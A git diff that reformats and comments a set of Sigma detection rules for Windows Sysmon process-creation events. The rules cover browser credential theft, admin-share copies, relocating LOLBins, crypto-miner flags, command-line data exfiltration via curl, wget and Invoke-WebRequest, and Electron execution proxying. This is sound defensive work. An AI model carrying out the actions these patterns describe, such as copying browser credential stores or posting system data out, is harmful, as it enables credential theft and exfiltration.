@@ -1,19 +1,13 @@ title: Potential Browser Data Stealing id: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b related: - - id: fc028194-969d-4122-8abe-0470d5b8f12f - type: derived + - id: fc028194-969d-4122-8abe-0470d5b8f12f + type: derived status: experimental -description: 'Adversaries may acquire credentials from web browsers by reading files - specific to the target browser. - - Web browsers commonly save credentials such as website usernames and passwords - so that they do not need to be entered manually in the future. - - Web browsers typically store the credentials in an encrypted format within a credential - store. - - ' +description: | + Adversaries may acquire credentials from web browsers by reading files specific to the target browser. + Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. + Web browsers typically store the credentials in an encrypted format within a credential store. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md author: Nasreddine Bencherchali (Nextron Systems) @@ -31,23 +25,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - CommandLine|contains: - - copy-item - - 'copy ' - - 'cpi ' - - ' cp ' - - 'move ' - - move-item - - ' mi ' - - ' mv ' - - Image|endswith: - - \xcopy.exe - - \robocopy.exe - - OriginalFileName: - - XCOPY.EXE - - robocopy.exe + - CommandLine|contains: + - copy-item + - 'copy ' + - 'cpi ' + - ' cp ' + - 'move ' + - move-item + - ' mi ' + - ' mv ' + - Image|endswith: + - \xcopy.exe + - \robocopy.exe + - OriginalFileName: + - XCOPY.EXE + - robocopy.exe selection_path: - CommandLine|contains: + CommandLine|contains: - \Amigo\User Data - \BraveSoftware\Brave-Browser\User Data - \CentBrowser\User Data 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_lateral_movement.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_lateral_movement.yml index 9d40a20f7..590e522c3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_lateral_movement.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_lateral_movement.yml @@ -1,15 +1,13 @@ title: Copy From Or To Admin Share Or Sysvol Folder id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 status: test -description: Detects a copy command or a copy utility execution to or from an Admin - share or remote +description: Detects a copy command or a copy utility execution to or from an Admin share or remote references: - https://twitter.com/SBousseaden/status/1211636381086339073 - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view - https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ -author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, - Zach Stanford @svch0st, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali date: 2019/12/30 modified: 2023/11/15 tags: 
@@ -28,30 +26,30 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_target: - CommandLine|contains: + CommandLine|contains: - \\\\*$ - \Sysvol\ selection_other_tools: - - Image|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - Image|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE selection_cmd_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cmd_cli: - CommandLine|contains: copy + CommandLine|contains: copy selection_pwsh_img: - - Image|contains: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|contains: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_pwsh_cli: - CommandLine|contains: + CommandLine|contains: - copy-item - 'copy ' - 'cpi ' @@ -60,8 +58,7 @@ detection: - move-item - ' mi ' - ' mv ' - condition: process_creation and (selection_target and (selection_other_tools or - all of selection_cmd_* or all of selection_pwsh_*)) + condition: process_creation and (selection_target and (selection_other_tools or all of selection_cmd_* or all of selection_pwsh_*)) falsepositives: - Administrative scripts level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir.yml index e5b2a3f85..f0508dd18 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir.yml 
@@ -1,23 +1,17 @@ title: Suspicious Copy From or To System Directory id: fff9d2b7-e11c-4a69-93d3-40ef66189767 related: - - id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 - type: derived + - id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 + type: derived status: test -description: 'Detects a suspicious copy operation that tries to copy a program from - system (System32, SysWOW64, WinSxS) directories to another on disk. - - Often used to move LOLBINs such as ''certutil'' or ''desktopimgdownldr'' to a - different location with a different name in order to bypass detections based on - locations. - - ' +description: | + Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. + Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. references: - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ -author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) date: 2020/07/03 modified: 2023/08/29 tags: 
@@ -33,33 +27,32 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: Image|endswith: \cmd.exe - CommandLine|contains: 'copy ' + CommandLine|contains: 'copy ' selection_pwsh: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - copy-item - ' copy ' - 'cpi ' - ' cp ' selection_other: - - Image|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - Image|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE target: - CommandLine|contains: + CommandLine|contains: - \System32 - \SysWOW64 - \WinSxS condition: process_creation and (1 of selection_* and target) falsepositives: - - Depend on scripts and administrative tools used in the monitored environment - (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) - - When cmd.exe and xcopy.exe are called directly + - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) + - When cmd.exe and xcopy.exe are called directly # C:\Windows\System32\cmd.exe /c copy file1 file2 - When the command contains the keywords but not in the correct order level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml index 28a283176..2628bc499 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml 
@@ -1,14 +1,11 @@ title: LOL-Binary Copied From System Directory id: f5d19838-41b5-476c-98d8-ba8af4929ee2 related: - - id: fff9d2b7-e11c-4a69-93d3-40ef66189767 - type: derived + - id: fff9d2b7-e11c-4a69-93d3-40ef66189767 + type: derived status: experimental -description: 'Detects a suspicious copy operation that tries to copy a known LOLBIN - from system (System32, SysWOW64, WinSxS) directories to another on disk in order - to bypass detections based on locations. - - ' +description: | + Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations. references: - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html @@ -28,30 +25,31 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_tools_cmd: Image|endswith: \cmd.exe - CommandLine|contains: 'copy ' + CommandLine|contains: 'copy ' selection_tools_pwsh: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - copy-item - ' copy ' - 'cpi ' - ' cp ' selection_tools_other: - - Image|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - Image|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE selection_target_path: - CommandLine|contains: + CommandLine|contains: - \System32 - \SysWOW64 - \WinSxS selection_target_lolbin: - CommandLine|contains: + CommandLine|contains: + # Note: add more binaries to increase coverage - \bitsadmin.exe - \calc.exe - \certutil.exe 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_crypto_mining_monero.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_crypto_mining_monero.yml index 5dbfbe4c6..4f4fb5e3f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_crypto_mining_monero.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_crypto_mining_monero.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ' --cpu-priority=' - --donate-level=0 - ' -o pool.' @@ -27,9 +27,11 @@ detection: - ' --algo=rx/0 ' - stratum+tcp:// - stratum+udp:// + # base64 encoded: --donate-level= - LS1kb25hdGUtbGV2ZWw9 - 0tZG9uYXRlLWxldmVsP - tLWRvbmF0ZS1sZXZlbD + # base64 encoded: stratum+tcp:// and stratum+udp:// - c3RyYXR1bSt0Y3A6Ly - N0cmF0dW0rdGNwOi8v - zdHJhdHVtK3RjcDovL @@ -37,7 +39,7 @@ detection: - N0cmF0dW0rdWRwOi8v - zdHJhdHVtK3VkcDovL filter: - CommandLine|contains: + CommandLine|contains: - ' pool.c ' - ' pool.o ' - gcc - diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml index 5affd2a37..6100c416c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml 
@@ -23,50 +23,49 @@ detection: - \powershell.exe - \pwsh.exe - \cmd.exe - CommandLine|contains: + CommandLine|contains: - Invoke-WebRequest - 'iwr ' - 'wget ' - 'curl ' - CommandLine|contains|all: - - ' -ur' - - ' -me' + CommandLine|contains|all: + - ' -ur' # Shortest possible version of the -uri flag + - ' -me' # Shortest possible version of the -method flag - ' -b' - ' POST ' selection_curl: Image|endswith: \curl.exe - CommandLine|contains: --ur + CommandLine|contains: --ur # Shortest possible version of the --uri flag selection_curl_data: - CommandLine|contains: - - ' -d ' + CommandLine|contains: + - ' -d ' # Shortest possible version of the --data flag - ' --data ' selection_wget: Image|endswith: \wget.exe - CommandLine|contains: + CommandLine|contains: - --post-data - --post-file payloads: - - CommandLine|contains: - - Get-Content - - GetBytes - - hostname - - ifconfig - - ipconfig - - net view - - netstat - - nltest - - qprocess - - sc query - - systeminfo - - tasklist - - ToBase64String - - whoami - - CommandLine|contains|all: - - 'type ' - - ' > ' - - ' C:\' - condition: process_creation and ((selection_iwr or all of selection_curl* or selection_wget) - and payloads) + - CommandLine|contains: + - Get-Content + - GetBytes + - hostname + - ifconfig + - ipconfig + - net view + - netstat + - nltest + - qprocess + - sc query + - systeminfo + - tasklist + - ToBase64String + - whoami + - CommandLine|contains|all: + - 'type ' + - ' > ' + - ' C:\' + condition: process_creation and ((selection_iwr or all of selection_curl* or selection_wget) and payloads) falsepositives: - Unlikely level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_disable_raccine.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_disable_raccine.yml index 7a0e1504f..e1fdadf74 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_disable_raccine.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_disable_raccine.yml 
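Review bot: The comment on `CommandLine|contains: --ur` in `selection_curl` says it is the shortest version of the `--uri` flag, but curl's long option is `--url`; the substring still matches `--url`, so only the comment is wrong and it should read `# Matches curl's --url flag`. Likewise the `' -d '` annotation in `selection_curl_data` calls `-d` the shortest version of `--data`, whereas it is curl's single-letter short form, so `# Short form of curl's --data flag` is more accurate. The `' -ur'`/`' -me'` comments in the PowerShell selection are fine as prefix abbreviations of `-Uri` and `-Method`; note that the selection containing those lines begins before this hunk.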
@@ -1,8 +1,7 @@ title: Raccine Uninstall id: a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc status: test -description: Detects commands that indicate a Raccine removal from an end system. - Raccine is a free ransomware protection tool. +description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. references: - https://github.com/Neo23x0/Raccine author: Florian Roth (Nextron Systems) @@ -20,16 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains|all: + CommandLine|contains|all: - 'taskkill ' - RaccineSettings.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - reg.exe - delete - Raccine Tray selection3: - CommandLine|contains|all: + CommandLine|contains|all: - schtasks - /DELETE - Raccine Rules Updater diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension.yml index 8f5f5c59b..2bb8c470b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension.yml 
@@ -1,17 +1,14 @@ title: Suspicious Double Extension File Execution id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 related: - - id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c - type: similar + - id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c # ParentImage/ParentCommandLine + type: similar status: stable -description: Detects suspicious use of an .exe extension after a non-executable file - extension like .pdf.exe, a set of spaces or underlines to cloak the executable - file in spear phishing campaigns +description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns references: - https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html - https://twitter.com/blackorbird/status/1140519090961825792 -author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) date: 2019/06/26 modified: 2023/02/28 tags: @@ -47,7 +44,7 @@ detection: - .rtf.js - .pdf.js - .txt.js - CommandLine|contains: + CommandLine|contains: - .doc.exe - .docx.exe - .xls.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension_parent.yml index 30b0cd171..4238c3dfe 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_double_extension_parent.yml @@ -1,8 +1,8 @@ title: Suspicious Parent Double Extension File Execution id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c related: - - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 - type: derived + - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 # Image/CommandLine + type: derived status: test description: Detect execution of suspicious double extension files in ParentCommandLine references: 
@@ -23,44 +23,44 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - ParentImage|endswith: - - .doc.lnk - - .docx.lnk - - .xls.lnk - - .xlsx.lnk - - .ppt.lnk - - .pptx.lnk - - .rtf.lnk - - .pdf.lnk - - .txt.lnk - - .doc.js - - .docx.js - - .xls.js - - .xlsx.js - - .ppt.js - - .pptx.js - - .rtf.js - - .pdf.js - - .txt.js - - ParentCommandLine|contains: - - .doc.lnk - - .docx.lnk - - .xls.lnk - - .xlsx.lnk - - .ppt.lnk - - .pptx.lnk - - .rtf.lnk - - .pdf.lnk - - .txt.lnk - - .doc.js - - .docx.js - - .xls.js - - .xlsx.js - - .ppt.js - - .pptx.js - - .rtf.js - - .pdf.js - - .txt.js + - ParentImage|endswith: + - .doc.lnk + - .docx.lnk + - .xls.lnk + - .xlsx.lnk + - .ppt.lnk + - .pptx.lnk + - .rtf.lnk + - .pdf.lnk + - .txt.lnk + - .doc.js + - .docx.js + - .xls.js + - .xlsx.js + - .ppt.js + - .pptx.js + - .rtf.js + - .pdf.js + - .txt.js + - ParentCommandLine|contains: + - .doc.lnk + - .docx.lnk + - .xls.lnk + - .xlsx.lnk + - .ppt.lnk + - .pptx.lnk + - .rtf.lnk + - .pdf.lnk + - .txt.lnk + - .doc.js + - .docx.js + - .xls.js + - .xlsx.js + - .ppt.js + - .pptx.js + - .rtf.js + - .pdf.js + - .txt.js condition: process_creation and selection falsepositives: - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_download_office_domain.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_download_office_domain.yml
index f02fc942c..57dd56a01 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_download_office_domain.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_download_office_domain.yml
@@ -1,8 +1,7 @@ title: Suspicious Download from Office Domain id: 00d49ed5-4491-4271-a8db-650a4ef6f8c1 status: test -description: Detects suspicious ways to download files from Microsoft domains that - are used to store attachments in Emails or OneNote documents +description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents references: - https://twitter.com/an0n_r0/status/1474698356635193346?s=12 - https://twitter.com/mrd0x/status/1475085452784844803?s=12
@@ -22,24 +21,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_download: - - Image|endswith: - - \curl.exe - - \wget.exe - - CommandLine|contains: - - Invoke-WebRequest - - 'iwr ' - - 'curl ' - - 'wget ' - - Start-BitsTransfer - - .DownloadFile( - - .DownloadString( + - Image|endswith: + - \curl.exe + - \wget.exe + - CommandLine|contains: + - Invoke-WebRequest + - 'iwr ' + - 'curl ' + - 'wget ' + - Start-BitsTransfer + - .DownloadFile( + - .DownloadString( selection_domains: - CommandLine|contains: + CommandLine|contains: - https://attachment.outlook.live.net/owa/ - https://onenoteonlinesync.onenote.com/onenoteonlinesync/ condition: process_creation and (all of selection_*) falsepositives: - - Scripts or tools that download attachments from these domains (OneNote, Outlook - 365) + - Scripts or tools that download attachments from these domains (OneNote, Outlook 365) level: high ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml
index e41bd776c..af2340fda 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml
@@ -20,7 +20,7 @@ detection: selection: Image|endswith: \DumpStack.log selection_download: - CommandLine|contains: ' -o DumpStack.log' + CommandLine|contains: ' -o DumpStack.log' condition: process_creation and (1 of selection*) falsepositives: - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml
index 32f55f6fb..6e5363bff 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml
@@ -19,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll selection_parent: ParentImage|contains|all: - \Windows\Installer\
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_electron_app_children.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_electron_app_children.yml
index 7cf39fc2a..8701fabb4 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_electron_app_children.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_electron_app_children.yml
@@ -1,15 +1,11 @@ title: Suspicious Electron Application Child Processes id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 related: - - id: 378a05d8-963c-46c9-bcce-13c7657eac99 - type: similar + - id: 378a05d8-963c-46c9-bcce-13c7657eac99 + type: similar status: experimental -description: 'Detects suspicious child processes of electron apps (teams, discord, - slack, etc.). This could be a potential sign of ".asar" file tampering (See reference - section for more information) or binary execution proxy through specific CLI arguments - (see related rule) - - ' +description: | + Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule) references: - https://taggart-tech.com/quasar-electron/ - https://github.com/mttaggart/quasar
@@ -33,7 +29,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_parent: ParentImage|endswith: - - \chrome.exe + # Add more electron based app to the list + - \chrome.exe # Might require additional tuning + # - '\code.exe' # Requires additional baseline - \discord.exe - \GitHubDesktop.exe - \keybase.exe
@@ -44,6 +42,7 @@ detection: - \Teams.exe selection_child_image: Image|endswith: + # Add more suspicious/unexpected paths - \cmd.exe - \cscript.exe - \mshta.exe
@@ -53,6 +52,7 @@ detection: - \wscript.exe selection_child_paths: Image|contains: + # Add more suspicious/unexpected paths - \AppData\Local\Temp\ - \Users\Public\ - \Windows\Temp\
@@ -60,6 +60,15 @@ detection: filter_main_chrome: ParentImage|endswith: \chrome.exe Image|endswith: \chrome.exe + # filter_main_code_1: + # ParentImage|endswith: '\code.exe' + # Image|endswith: '\code.exe' + # filter_main_code_2: + # # Note: As code allows many other programs its best to baseline this + # ParentImage|endswith: '\code.exe' + # Image|endswith: + # - '\cmd.exe' + # - '\powershell.exe' filter_main_discord: ParentImage|endswith: \discord.exe Image|endswith: \discord.exe
@@ -90,10 +99,10 @@ detection: - C:\Windows\System32\WerFault.exe filter_optional_discord: ParentImage|endswith: \Discord.exe - CommandLine|contains: \NVSMI\nvidia-smi.exe - condition: process_creation and (selection_parent and 1 of selection_child_* and - not 1 of filter_main_* and not 1 of filter_optional_*) + CommandLine|contains: \NVSMI\nvidia-smi.exe + condition: process_creation and (selection_parent and 1 of selection_child_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate child processes can occur in cases of debugging +# Increase the level once FP rate is known better (see status) level: medium ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml
index 09be74368..eaa111a99 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml
@@ -1,12 +1,10 @@ title: Potentially Suspicious Electron Application CommandLine id: 378a05d8-963c-46c9-bcce-13c7657eac99 related: - - id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 - type: similar + - id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 + type: similar status: experimental -description: Detects potentially suspicious CommandLine of electron apps (teams, discord, - slack, etc.). This could be a sign of abuse to proxy execution through a signed - binary. +description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. references: - https://positive.security/blog/ms-officecmd-rce - https://lolbas-project.github.io/lolbas/Binaries/Teams/
@@ -28,32 +26,34 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \chrome.exe - - \code.exe - - \discord.exe - - \GitHubDesktop.exe - - \keybase.exe - - \msedge_proxy.exe - - \msedge.exe - - \msedgewebview2.exe - - \msteams.exe - - \slack.exe - - \Teams.exe - - OriginalFileName: - - chrome.exe - - code.exe - - discord.exe - - GitHubDesktop.exe - - keybase.exe - - msedge_proxy.exe - - msedge.exe - - msedgewebview2.exe - - msteams.exe - - slack.exe - - Teams.exe + - Image|endswith: + # Add more electron based app to the list + - \chrome.exe + - \code.exe + - \discord.exe + - \GitHubDesktop.exe + - \keybase.exe + - \msedge_proxy.exe + - \msedge.exe + - \msedgewebview2.exe + - \msteams.exe + - \slack.exe + - \Teams.exe + - OriginalFileName: + # Add more electron based app to the list + - chrome.exe + - code.exe + - discord.exe + - GitHubDesktop.exe + - keybase.exe + - msedge_proxy.exe + - msedge.exe + - msedgewebview2.exe + - msteams.exe + - slack.exe + - Teams.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - --browser-subprocess-path - --gpu-launcher - --renderer-cmd-prefix
@@ -61,5 +61,6 @@ detection: condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage for debugging purposes +# Increase the level once FP rate is known better (see status) level: medium ruletype: Sigma
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml
index 1a6494da0..13b2d6f42 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml
@@ -1,11 +1,10 @@ title: Elevated System Shell Spawned From Uncommon Parent Location id: 178e615d-e666-498b-9630-9ed363038101 related: - - id: 61065c72-5d7d-44ef-bf41-6a36684b545f - type: similar + - id: 61065c72-5d7d-44ef-bf41-6a36684b545f + type: similar status: experimental -description: Detects when a shell program such as the Windows command prompt or PowerShell - is launched with system privileges from a uncommon parent location. +description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location. references: - https://github.com/Wh04m1001/SysmonEoP author: frack113, Tim Shelton (update fp)
@@ -25,43 +24,50 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_shell: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe selection_user: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI LogonId: '0x3e7' filter_main_generic: + # Example 1: + # C:\Program Files\erl-23.2\erts-11.1.4\bin\erl.exe" -service_event ErlSrv_RabbitMQ -nohup -sname rabbit@localhost -s rabbit boot -boot start_sasl +W w +MBas ageffcbf +MHas ageffcbf +MBlmbcs 512 +MHlmbcs 512 +MMmcs 30 +P 1048576 +t 5000000 +stbt db +zdbbl 128000 +sbwt none +sbwtdcpu none +sbwtdio none -kernel inet_dist_listen_min 25672 -kernel inet_dist_listen_max 25672 -lager crash_log false -lager handlers [] + # Example 2: + # ParentImage: C:\Program Files (x86)\Varonis\DatAdvantage\GridCollector\VrnsRealTimeAlertsSvc.exe" /appid 000000ad-cb03-500b-9459-c46d000000ad + # CommandLine: C:\Windows\system32\cmd.exe /c C:\Program Files "(x86)\Varonis\DatAdvantage\GridCollector\handle_scopes.cmd C:\Collector" Working Share\VaronisWorkDirectoryCollector ParentImage|contains: - :\Program Files (x86)\ - :\Program Files\ - :\ProgramData\ - :\Windows\System32\ - :\Windows\SysWOW64\ - - :\Windows\Temp\ + - :\Windows\Temp\ # Installers - :\Windows\WinSxS\ filter_optional_manageengine: + # Example: + # ParentImage: C:/ManageEngine/ADManager Plus/pgsql/bin/postgres.exe" --forkarch 5380 + # CommandLine: C:\Windows\system32\cmd.exe /c "IF EXIST archive.bat (archive.bat pg_wal\000000010000008E000000EA 000000010000008E000000EA) ParentImage|endswith: :\ManageEngine\ADManager Plus\pgsql\bin\postgres.exe Image|endswith: \cmd.exe filter_optional_asgard: - CommandLine|contains: :\WINDOWS\system32\cmd.exe /c " + CommandLine|contains: :\WINDOWS\system32\cmd.exe /c " 
CurrentDirectory|contains: :\WINDOWS\Temp\asgard2-agent\ filter_optional_ibm_spectrumprotect: ParentImage|contains: :\IBM\SpectrumProtect\webserver\scripts\ - CommandLine|contains: :\IBM\SpectrumProtect\webserver\scripts\ + CommandLine|contains: :\IBM\SpectrumProtect\webserver\scripts\ filter_main_parent_null: - ParentImage: null + ParentImage: filter_main_parent_empty: ParentImage: '' - condition: process_creation and (all of selection_* and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: process_creation and (all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium
diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_embed_exe_lnk.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_embed_exe_lnk.yml
index 30c1ce844..93b5e2acf 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_susp_embed_exe_lnk.yml
